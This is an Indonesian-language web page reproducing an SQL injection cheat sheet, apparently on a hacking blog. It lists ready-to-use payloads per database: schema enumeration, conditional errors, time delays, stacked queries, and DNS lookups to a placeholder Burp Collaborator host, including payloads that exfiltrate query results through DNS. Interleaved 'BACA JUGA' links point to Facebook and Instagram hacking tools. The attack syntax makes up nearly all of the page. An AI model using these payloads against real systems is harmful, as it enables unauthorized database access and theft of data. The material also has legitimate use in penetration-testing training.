Menu Tutup

SQL injection cheat sheet

SQL injection cheat sheet ini berisi contoh sintaks berguna yang dapat Anda gunakan untuk melakukan berbagai tugas yang sering muncul saat melakukan serangan injeksi SQL.

Rangkaian string

Anda dapat menyatukan beberapa string untuk membuat satu string.

Oracle 'foo'||'bar'
Microsoft 'foo'+'bar'
PostgreSQL 'foo'||'bar'
MySQL 'foo' 'bar' [Note the space between the two strings]
CONCAT('foo','bar')

Substring

Anda dapat mengekstraksi bagian string, dari offset tertentu dengan panjang tertentu. Perhatikan bahwa indeks offset berbasis 1. Setiap ekspresi berikut akan mengembalikan string ba.

Oracle SUBSTR('foobar', 4, 2)
Microsoft SUBSTRING('foobar', 4, 2)
PostgreSQL SUBSTRING('foobar', 4, 2)
MySQL SUBSTRING('foobar', 4, 2)

Comments

Anda dapat menggunakan komentar untuk memotong kueri dan menghapus bagian dari kueri asli yang mengikuti input Anda.

Oracle --comment
Microsoft --comment
/*comment*/
PostgreSQL --comment
/*comment*/
MySQL #comment
-- comment [Note the space after the double dash]
/*comment*/

Database version

Anda dapat meminta basis data untuk menentukan jenis dan versinya. Informasi ini berguna ketika merumuskan serangan yang lebih rumit.

Oracle SELECT banner FROM v$version
SELECT version FROM v$instance
Microsoft SELECT @@version
PostgreSQL SELECT version()
MySQL SELECT @@version

Database contents

Anda bisa daftar tabel yang ada di database, dan kolom yang berisi tabel tersebut.

BACA JUGA  Cara Hack Facebook dengan Termux Script Hack Fb 2020
Oracle SELECT * FROM all_tables
SELECT * FROM all_tab_columns WHERE table_name = 'TABLE-NAME-HERE'
Microsoft SELECT * FROM information_schema.tables
SELECT * FROM information_schema.columns WHERE table_name = 'TABLE-NAME-HERE'
PostgreSQL SELECT * FROM information_schema.tables
SELECT * FROM information_schema.columns WHERE table_name = 'TABLE-NAME-HERE'
MySQL SELECT * FROM information_schema.tables
SELECT * FROM information_schema.columns WHERE table_name = 'TABLE-NAME-HERE'

Conditional errors

Anda dapat menguji kondisi boolean tunggal dan memicu kesalahan basis data jika kondisinya benar.

Oracle SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN to_char(1/0) ELSE NULL END FROM dual
Microsoft SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN 1/0 ELSE NULL END
PostgreSQL SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN cast(1/0 as text) ELSE NULL END
MySQL SELECT IF(YOUR-CONDITION-HERE,(SELECT table_name FROM information_schema.tables),'a')

Batched (or stacked) queries

Anda bisa menggunakan kueri batched untuk menjalankan beberapa kueri berturut-turut. Perhatikan bahwa sementara kueri berikutnya dieksekusi, hasilnya tidak dikembalikan ke aplikasi. Karenanya teknik ini terutama digunakan dalam kaitannya dengan kerentanan buta di mana Anda dapat menggunakan kueri kedua untuk memicu pencarian DNS, kesalahan kondisional, atau penundaan waktu.

Oracle Does not support batched queries.
Microsoft QUERY-1-HERE; QUERY-2-HERE
PostgreSQL QUERY-1-HERE; QUERY-2-HERE
MySQL Does not support batched queries.

Time delays

Anda dapat menyebabkan waktu tunda dalam database ketika permintaan diproses. Berikut ini akan menyebabkan penundaan waktu tanpa syarat 10 detik.

BACA JUGA  Instagram Private Tools x toolsig v2.2 Update on 2020
Oracle dbms_pipe.receive_message(('a'),10)
Microsoft WAITFOR DELAY '0:0:10'
PostgreSQL SELECT pg_sleep(10)
MySQL SELECT sleep(10)

Conditional time delays

Anda dapat menguji kondisi boolean tunggal dan memicu waktu tunda jika kondisinya benar.

Oracle SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN 'a'||dbms_pipe.receive_message(('a'),10) ELSE NULL END FROM dual
Microsoft IF (YOUR-CONDITION-HERE) WAITFOR DELAY '0:0:10'
PostgreSQL SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN pg_sleep(10) ELSE pg_sleep(0) END
MySQL SELECT IF(YOUR-CONDITION-HERE,sleep(10),'a')

DNS lookup

Anda dapat menyebabkan database melakukan pencarian DNS ke domain eksternal. Untuk melakukan ini, Anda harus menggunakan klien Burp Collaborator untuk menghasilkan subdomain Burp Collaborator unik yang akan Anda gunakan dalam serangan Anda, dan kemudian polling server Collaborator untuk mengonfirmasi bahwa pencarian DNS terjadi.

Oracle The following technique leverages an XML external entity (XXE) vulnerability to trigger a DNS lookup. The vulnerability has been patched but there are many unpatched Oracle installations in existence:
SELECT extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://YOUR-SUBDOMAIN-HERE.burpcollaborator.net/"> %remote;]>'),'/l') FROM dualThe following technique works on fully patched Oracle installations, but requires elevated privileges:
SELECT UTL_INADDR.get_host_address('YOUR-SUBDOMAIN-HERE.burpcollaborator.net')
Microsoft exec master..xp_dirtree '//YOUR-SUBDOMAIN-HERE.burpcollaborator.net/a'
PostgreSQL copy (SELECT '') to program 'nslookup YOUR-SUBDOMAIN-HERE.burpcollaborator.net'
MySQL The following techniques work on Windows only:
LOAD_FILE('\\\\YOUR-SUBDOMAIN-HERE.burpcollaborator.net\\a')
SELECT ... INTO OUTFILE '\\\\YOUR-SUBDOMAIN-HERE.burpcollaborator.net\a'

DNS lookup with data exfiltration

Anda dapat menyebabkan database melakukan pencarian DNS ke domain eksternal yang berisi hasil dari kueri yang disuntikkan. Untuk melakukan ini, Anda harus menggunakan klien Burp Collaborator untuk menghasilkan subdomain Burp Collaborator unik yang akan Anda gunakan dalam serangan Anda, dan kemudian polling server Collaborator untuk mengambil detail dari setiap interaksi DNS, termasuk data yang di-exfiltrated.

BACA JUGA  Tools hacking terbaik 2020
Oracle SELECT extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://'||(SELECT YOUR-QUERY-HERE)||'.YOUR-SUBDOMAIN-HERE.burpcollaborator.net/"> %remote;]>'),'/l') FROM dual
Microsoft declare @p varchar(1024);set @p=(SELECT YOUR-QUERY-HERE);exec('master..xp_dirtree "//'+@p+'.YOUR-SUBDOMAIN-HERE.burpcollaborator.net/a"')
PostgreSQL create OR replace function f() returns void as $$
declare c text;
declare p text;
begin
SELECT into p (SELECT YOUR-QUERY-HERE);
c := 'copy (SELECT '''') to program ''nslookup '||p||'.YOUR-SUBDOMAIN-HERE.burpcollaborator.net''';
execute c;
END;
$$ language plpgsql security definer;
SELECT f();
MySQL The following technique works on Windows only:
SELECT YOUR-QUERY-HERE INTO OUTFILE '\\\\YOUR-SUBDOMAIN-HERE.burpcollaborator.net\a'

Tinggalkan Balasan